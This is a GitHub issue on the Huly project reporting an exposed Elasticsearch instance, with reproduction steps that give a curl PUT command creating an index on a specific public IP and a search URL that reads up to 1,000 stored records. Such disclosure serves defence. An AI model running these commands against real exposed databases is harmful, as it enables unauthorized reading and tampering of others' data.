Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Elasticsearch instance unprotected, thus allowing an attacker to perform write/read operations on the database huly #7508

Open
shadihh9 opened this issue Dec 19, 2024 · 0 comments
Open

Elasticsearch instance unprotected, thus allowing an attacker to perform write/read operations on the database huly #7508

shadihh9 opened this issue Dec 19, 2024 · 0 comments

Comments

@shadihh9
Copy link

Description of the issue

A clear and concise description of the issue.
i found bug Elasticsearch instance unprotected, thus allowing an attacker to perform write/read operations on the database huly

Your environment

  • Version of Huly
  • Browser (and version)
  • Your operating system (and version)

Steps to reproduce

Please produce the steps for us to reproduce this issue.
1- i use for exploit bug and create poc in db by used in linux os

curl -XPUT 'http://23.94.180.12:9200/poc3' and see create poc in db
http://23.94.180.12:9200/poc3
and go to http://23.94.180.12:9200/huly_storage_index_v1/_search?size=1000 and see huly in url thats means own company

Expected behaviour

Tell us what should happen.

Actual behaviour

Tell us what happens instead (include screenshots or logs).
thus allowing an attacker to perform write/read operations on the huly
huly1
huly2
huly3

Possible solutions

(Not obligatory)
If you know how to fix the bug, please describe your solution here.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@shadihh9